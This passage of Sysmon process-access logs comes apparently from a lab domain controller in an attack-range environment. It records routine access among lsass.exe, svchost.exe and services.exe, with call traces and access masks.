C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.240\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.240","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.240\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.240","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.256","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.256\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 